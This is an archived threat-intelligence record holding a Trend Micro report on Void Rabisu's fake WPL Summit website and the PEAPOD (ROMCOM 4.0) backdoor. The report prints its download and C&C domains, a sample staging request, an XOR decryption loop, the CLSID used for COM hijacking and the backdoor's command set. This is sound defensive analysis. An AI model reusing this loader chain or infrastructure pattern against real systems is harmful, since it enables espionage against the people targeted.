{
	"id": "ee678204-c40c-4adf-8a99-45b44a4730c6",
	"created_at": "2026-04-06T00:21:14.149978Z",
	"updated_at": "2026-04-10T03:28:28.138034Z",
	"deleted_at": null,
	"sha1_hash": "c1c7ef970ad7ca554dff52032de9da5e427ee4e7",
	"title": "Void Rabisu Targets Female Political Leaders with New Slimmed-Down ROMCOM Variant",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2664329,
	"plain_text": "Void Rabisu Targets Female Political Leaders with New Slimmed-Down ROMCOM Variant\r\nBy: Feike Hacquebord, Fernando Merces Oct 13, 2023 Read time: 9 min (2306 words)\r\nPublished: 2023-10-13 · Archived: 2026-04-05 18:32:19 UTC\r\nAPT \u0026 Targeted Attacks\r\nAlmost a year after Void Rabisu shifted its targeting from opportunistic ransomware attacks to campaigns with an emphasis on\r\ncyberespionage, the threat actor is still developing its main malware, the ROMCOM backdoor.\r\nVoid Rabisu is an intrusion set associated with both financially motivated ransomware attacks and targeted\r\ncampaigns on Ukraine and countries supporting Ukraine. Among the threat actor’s previous targets were the\r\nUkrainian government and military, their energy and water utility sectors, EU politicians, spokespersons of a\r\ncertain EU government, and security conference participants. In campaigns conducted in late June and early\r\nAugust 2023, Void Rabisu targeted EU military personnel and political leaders working on gender equality\r\ninitiatives. Among the notable tools used by Void Rabisu is the ROMCOM backdoor, of which it seems to be the\r\nexclusive user. ROMCOM itself has gone through various developments over time, including the implementation\r\nof more effective detection evasion techniques.\r\nVoid Rabisu is one of the clearest examples where we see a mix of the typical tactics, techniques, and procedures\r\n(TTPs) used by cybercriminal threat actors and TTPs used by nation-state-sponsored threat actors motivated\r\nprimarily by espionage goals. For example, Void Rabisu has been signing malware with certificates most likely\r\nbought from a third-party service provider that other cybercriminal groups are also using. 
The threat actor has also\r\nemployed malicious advertisements on both Google and Bing to generate search engine traffic to their lure sites,\r\nwhich contain malicious copies of software often used by system administrators.\r\nVoid Rabisu also acts like an advanced persistent threat (APT) actor when it targets governments and military. In\r\nJune 2023, Void Rabisu exploited the vulnerability CVE-2023-36884 — still a zero-day vulnerability then — in\r\ncampaigns using the Ukrainian World Congress and the July 2023 NATO summit as lures. The extraordinary\r\ngeopolitical circumstances surrounding the war in Ukraine drive some of the financially motivated threat actors\r\n(including Void Rabisu) toward campaigns motivated by espionage.\r\nAs reported by Microsoft, Void Rabisu used a zero-day vulnerability related to CVE-2023-36884 in attacks\r\ntargeting governments at the end of June 2023. Trend Micro’s telemetry further confirms that this campaign\r\ntargeted the military, government personnel, and politicians in Europe.\r\nThe payload spread by Void Rabisu during this period differed from the ROMCOM backdoor we analyzed in an\r\nearlier blog entry, but the two have clear similarities. This indicates that the threat actors are actively developing\r\nthe ROMCOM backdoor.\r\nhttps://www.trendmicro.com/en_us/research/23/j/void-rabisu-targets-female-leaders-with-new-romcom-variant.html\r\nPage 1 of 9\n\nThe next iteration of the malware was used in early August 2023. On or around Aug. 8, 2023, Void Rabisu set up a\r\nmalicious copy of the official website of the Women Political Leaders (WPL) Summit that was held in Brussels\r\nfrom June 7 to 8, 2023. The final payload was a new version of the ROMCOM backdoor that we have dubbed\r\n“ROMCOM 4.0” (also known as PEAPOD).\r\nAttended by people from all over the world, the WPL summit aims to improve gender equality in politics. 
Among\r\nthe topics included in the 2023 Brussels conference were peace and security, war and oppression, disinformation,\r\nthe war in Ukraine, the role of women in politics, and gender equality. Since many current and future political\r\nleaders had attended this conference, it presented an interesting target for espionage campaigns and served as a\r\npossible avenue for threat actors to gain an initial foothold in political organizations. It is therefore not surprising\r\nthat Void Rabisu set up a campaign targeting WPL Summit 2023 attendees. Our telemetry provided concrete\r\nevidence that this campaign was aimed at targets working on gender equality in EU politics.\r\nIn some of its latest campaigns, Void Rabisu started using a new technique that has not previously been reported\r\non. It involves a TLS-enforcing technique by the ROMCOM command-and-control (C\u0026C) servers that can render\r\nthe automated discovery of ROMCOM infrastructure more difficult. We observed Void Rabisu using this\r\ntechnique in a May 2023 ROMCOM campaign that spread a malicious copy of the legitimate PaperCut software,\r\nin which the C\u0026C server ignored requests that were not conformant.\r\nThis report provides a general background on Void Rabisu and its activities with regard to the recent WPL Summit\r\ncampaign. We begin by describing how Void Rabisu targeted WPL Summit attendees in the following section.\r\nThe fake WPL Summit 2023 page\r\nOn Aug. 8, 2023, Void Rabisu actors set up a website called wplsummit[.]com to attract visitors of the legitimate\r\nwplsummit.org domain. The fake website (shown in Figure 1) looked exactly like the legitimate one.\r\nFigure 1. 
WPL Summit 2023 fake website\r\nWhile the “Videos \u0026 photos” link of the legitimate domain redirects visitors to a Google Drive folder containing\r\nphotographs from the event, the wplsummit[.]com fake website directed visitors to a OneDrive folder containing\r\ntwo compressed files and an executable called Unpublished Pictures 1-20230802T122531-002-sfx.exe. The latter\r\nfile appears to be a piece of malware, the binary of which we analyze in the next section.\r\nFigure 2. The OneDrive folder containing WPL Summit 2023 pictures and a malware downloader\r\nMalware analysis\r\nThe executable downloaded from the OneDrive folder is signed by a company called Elbor LLC (which was\r\npreviously used to sign multiple malicious files) with a valid certificate. When executed, it pretends to be a self-extracting (SFX) archive and extracts 56 pictures from its resource section to a folder when the user selects the\r\n“Extract” button:\r\nFigure 4. Pictures dropped by the malware downloader from the event (gathered by the threat actor\r\nfrom various social media postings)\r\nThe extracted photos were sourced by the malicious actor from individual posts on various social media platforms\r\nsuch as LinkedIn, X (formerly known as Twitter), and Instagram. While the victim is distracted with the pictures,\r\nthe malware sends an HTTP GET request to https://mctelemetryzone[.]com/favicon.ico. 
The HTTP User-Agent\r\nstring is checked on the server side, and if it matches the following string, a 122-KB file is downloaded:\r\n“Mozilla/5.0 (Windows NT 10.0; Win64; x64; Xbox; Xbox One) AppleWebKit/537.36 (KHTML, like Gecko)\r\nChrome/114.0.0.0 Safari/537.36 Edge/44.18363.8131”\r\nThe file is an XOR-encrypted PE file:\r\nThe downloaded file can be decrypted with the following pseudocode:\r\nfor (i=0; i\u003clen; i++)\r\n    data[i] = data[i] ^ 0xf0 * i\r\nThe decrypted file is a 64-bit DLL that exports a CPLInit() function. The first-stage downloader then loads this\r\nDLL into memory and calls this function. It’s important to highlight that this DLL never touches the disk. In other\r\nwords, its download, decryption, and execution routines all happen at runtime in memory.\r\nPayload setup\r\nThe DLL that runs from memory is internally called trymenow.dll. It reaches out to the legitimate online service\r\nworldtimeapi.org to obtain a unique timestamp for the current date and time in Unix Epoch format. This is later\r\nused to seed a calculation algorithm that generates the URL path for the next request.\r\nThe path matches the regular expression [12]/[0-9]{9}, where the first part before the slash represents what\r\ncomponent the downloader is requesting. The next part after the slash is possibly an identifier, as it is consistent\r\nbetween requests. The URL is encoded using the Base64 format before the request is sent to redditanalytics[.]\r\npm in order to download the third-stage component. 
The following is a sample request:\r\nGET https://redditanalytics.pm/Mi8xMzI0NTY3ODk=\r\nAccept:           */*\r\nUA-CPU:           AMD64\r\nAccept-Encoding:  gzip, deflate\r\nUser-Agent:       Mozilla/5.0 (iPhone; CPU iPhone OS 16_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML,\r\nlike Gecko) Version/16.0 EdgiOS/114.1823.67 Mobile/15E148 Safari/605.1.15\r\nHost:             redditanalytics.pm\r\nConnection:       Keep-Alive\r\nOn the server side, the URL path is decoded. If everything is correct, the server replies with another XOR-encrypted file that will be decrypted and stored at %PUBLIC%\\AccountPictures\\Defender\\Security.dll, which is\r\nthe DLL used for COM hijacking. This time, Void Rabisu chose to hijack CLSID {F5078F32-C551-11D3-89B9-0000F81FE221}, which is used by the WordPad application.\r\nThe next step involves reaching out to worldtimeapi.org again to get an updated timestamp and download another\r\ncomponent from redditanalytics[.]pm, which is the component that talks to the C\u0026C server\r\nnetstaticsinformation[.]com. (This is the network component from our previous blog entry.)\r\nAfter both payloads are downloaded, WordPad is launched, causing the first payload to execute via COM\r\nhijacking.\r\nC\u0026C server communication\r\nThe PEAPOD samples we analyzed force WinHTTP functions to use TLS 1.2 instead of the default version\r\nchosen by the operating system. A C\u0026C server for a previous campaign using the legitimate PaperCut software as\r\na lure checked the TLS version of a client HTTP request and would not respond with a payload if the request was\r\nnot conformant. 
However, the C\u0026C server for the campaign targeting WPL Summit 2023 attendees responded as\r\nexpected, regardless of the TLS version negotiation used to initiate the communication.\r\nThe malware first prepares the right flag for later use with WinHttpSetOption(). Afterward, it creates an HTTP\r\nsession using Microsoft Edge 1.0 as the User-Agent string. However, before anything is sent to the server, the\r\nconnection is set to use TLS 1.2.\r\nWe checked how different Windows versions treat SSL/TLS usage, which we summarize in the following table:\r\nOperating System | WinHTTP flag | TLS version used\r\nWindows 11 | WINHTTP_FLAG_SECURE_PROTOCOL_TLS1_2 | 1.2\r\nWindows 11 | (not set / default) | 1.3\r\nWindows 10 | WINHTTP_FLAG_SECURE_PROTOCOL_TLS1_2 | 1.2\r\nWindows 10 | (not set / default) | 1.2\r\nWindows 7 | WINHTTP_FLAG_SECURE_PROTOCOL_TLS1_2 | An error occurs\r\nWindows 7 | (not set / default) | 1\r\nTable 1. A summary of how Windows versions treat SSL/TLS usage\r\nBased on the table, we believe that PEAPOD cannot infect systems running Windows 7 and earlier versions. Why\r\nVoid Rabisu uses this flag is still an open question, but it is possible that it wanted to implement some form of\r\nchecking on the C\u0026C server side to make C\u0026C fingerprinting harder.\r\nBefore sending the POST request by calling WinHttpSendRequest(), additional flags are set to ignore all certificate\r\nerrors. An empty request is sent, followed by a request containing a command to let the C\u0026C server know about\r\nthe victim.\r\nFigure 6. 
Additional flags are set to ignore all certificate errors\r\nIf the malware cannot reach out to the C\u0026C server using HTTPS, it tries to connect via raw TCP (Transmission\r\nControl Protocol) at port 442 or ICMP (Internet Control Message Protocol).\r\nComparing ROMCOM 3.0 and PEAPOD\r\nThanks to Volexity researchers who shared a previous PEAPOD sample with us, we were able\r\nto confirm that Void Rabisu seems to have temporarily stopped using ROMCOM 3.0 and has begun delivering\r\nPEAPOD, which has some architectural differences compared to ROMCOM 3.0. We highlight these differences in\r\nthe following table:\r\nCapability | ROMCOM 3.0 | PEAPOD\r\nDropper | Modified installation program (MSI or EXE) that drops the other components | EXE downloads XOR-encrypted DLL, which downloads the other components\r\nCore malware modularity | Three components: COM hijacking (loader), worker, and network | Three components observed: COM hijacking (loader), worker (stored in Windows Registry) and network. Most of them loaded from memory.\r\nComponents inter-process communication (IPC) | Localhost sockets | Named pipes\r\nCommands | 42 commands handled by the worker component | 10 commands in total. The network component handles 7 of them directly and forwards the other 3 to the worker component.\r\nTable 2. 
Key differences between ROMCOM 3.0 and PEAPOD\r\nWe summarize the commands supported by PEAPOD in the following table:\r\nCommand | Description | Details\r\n0 | No action | The function that handles the commands will return zero and the malware will wait for the next command\r\n1 | Run command | Executes a command and sends back its output\r\n2 | Uploads file | Uploads a file to the infected machine\r\n3 | Downloads file | Downloads a file from the infected machine\r\n4 | Run command | Executes a command\r\n5 | Updates the interval at which the backdoor checks for new activity (default 60 seconds) | The new interval received is sent to security.dll via the named pipe and security.dll then writes it to the registry\r\n6 | Gets system info | Retrieves RAM, processor info, local time, and username\r\n7 | Updates the network component | The data for the new version of the network component is written to a named pipe, which is read by the loader (security.dll) and updated in the Windows registry\r\n8 | Uninstalls PEAPOD | Registry keys are cleaned, and all files are deleted\r\n9 | Gets the service name | Returns the service DisplayName from the registry\r\nTable 3. Commands supported by PEAPOD\r\nBy using the commands listed in Table 3, it is still possible for systems infected by PEAPOD to download a third\r\ncomponent that is more like the ROMCOM 3.0 worker, which would allow the threat actors to have the same level\r\nof control over the victims that they targeted with ROMCOM 3.0. However, machines we infected in our lab did\r\nnot download any additional components.\r\nConclusions and outlook\r\nAlmost a year after Void Rabisu shifted its targeting from opportunistic ransomware attacks to campaigns with an emphasis on\r\ncyberespionage, the threat actor is still developing its main malware, the ROMCOM backdoor. 
The backdoor\r\nbeing stripped down to its core, with additional components being downloaded as needed, provides Void Rabisu\r\nthe choice of loading additional components for specific targets. From the attacker’s perspective, this has the\r\nadvantage of less exposure for the additional components, making them more difficult for malware\r\nresearchers to collect.\r\nSome of Void Rabisu’s campaigns very narrowly target politicians, government employees, and the military. This\r\nmeans that Void Rabisu has branched out into an area that is usually covered by APT groups typically thought to\r\nbe nation-state-sponsored.\r\nWhile we have no evidence that Void Rabisu is nation-state-sponsored, it’s possible that it is one of the financially\r\nmotivated threat actors from the criminal underground that got pulled into cyberespionage activities due to the\r\nextraordinary geopolitical circumstances caused by the war in Ukraine.\r\nVoid Rabisu has targeted participants of at least three conferences in 2023, namely the Munich Security\r\nConference, the Masters of Digital conference, and the WPL Summit. It is possible, and even expected, that other\r\nconferences and special interest groups will be targeted by Void Rabisu in the future. We will keep paying close\r\nattention to Void Rabisu’s TTPs and report on new campaigns as we find them.\r\nIndicators of Compromise (IOCs)\r\nThe indicators of compromise for this entry can be found in this link.\r\nWith additional contribution from Lord Remorin\r\nSource: https://www.trendmicro.com/en_us/research/23/j/void-rabisu-targets-female-leaders-with-new-romcom-variant.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://www.trendmicro.com/en_us/research/23/j/void-rabisu-targets-female-leaders-with-new-romcom-variant.html"
	],
	"report_names": [
		"void-rabisu-targets-female-leaders-with-new-romcom-variant.html"
	],
	"threat_actors": [
		{
			"id": "fecc0d5a-3654-425d-9290-b6d0b4105463",
			"created_at": "2023-10-17T02:00:08.330061Z",
			"updated_at": "2026-04-10T02:00:03.37711Z",
			"deleted_at": null,
			"main_name": "Void Rabisu",
			"aliases": [
				"Tropical Scorpius"
			],
			"source_name": "MISPGALAXY:Void Rabisu",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "555e2cac-931d-4ad4-8eaa-64df6451059d",
			"created_at": "2023-01-06T13:46:39.48103Z",
			"updated_at": "2026-04-10T02:00:03.342729Z",
			"deleted_at": null,
			"main_name": "RomCom",
			"aliases": [
				"UAT-5647",
				"Storm-0978"
			],
			"source_name": "MISPGALAXY:RomCom",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "d58052ba-978b-4775-985a-26ed8e64f98c",
			"created_at": "2023-09-07T02:02:48.069895Z",
			"updated_at": "2026-04-10T02:00:04.946879Z",
			"deleted_at": null,
			"main_name": "Tropical Scorpius",
			"aliases": [
				"DEV-0978",
				"RomCom",
				"Storm-0671",
				"Storm-0978",
				"TA829",
				"Tropical Scorpius",
				"UAC-0180",
				"UNC2596",
				"Void Rabisu"
			],
			"source_name": "ETDA:Tropical Scorpius",
			"tools": [
				"COLDDRAW",
				"Cuba",
				"Industrial Spy",
				"PEAPOD",
				"ROMCOM",
				"ROMCOM RAT",
				"SingleCamper",
				"SnipBot"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "4f56bb34-098d-43f6-a0e8-99616116c3ea",
			"created_at": "2024-06-19T02:03:08.048835Z",
			"updated_at": "2026-04-10T02:00:03.870819Z",
			"deleted_at": null,
			"main_name": "GOLD FLAMINGO",
			"aliases": [
				"REF9019 ",
				"Tropical Scorpius ",
				"UAC-0132 ",
				"UAC0132 ",
				"UNC2596 ",
				"Void Rabisu "
			],
			"source_name": "Secureworks:GOLD FLAMINGO",
			"tools": [
				"Chanitor",
				"Cobalt Strike",
				"Cuba",
				"Meterpreter",
				"Mimikatz",
				"ROMCOM RAT"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775434874,
	"ts_updated_at": 1775791708,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/c1c7ef970ad7ca554dff52032de9da5e427ee4e7.pdf",
		"text": "https://archive.orkl.eu/c1c7ef970ad7ca554dff52032de9da5e427ee4e7.txt",
		"img": "https://archive.orkl.eu/c1c7ef970ad7ca554dff52032de9da5e427ee4e7.jpg"
	}
}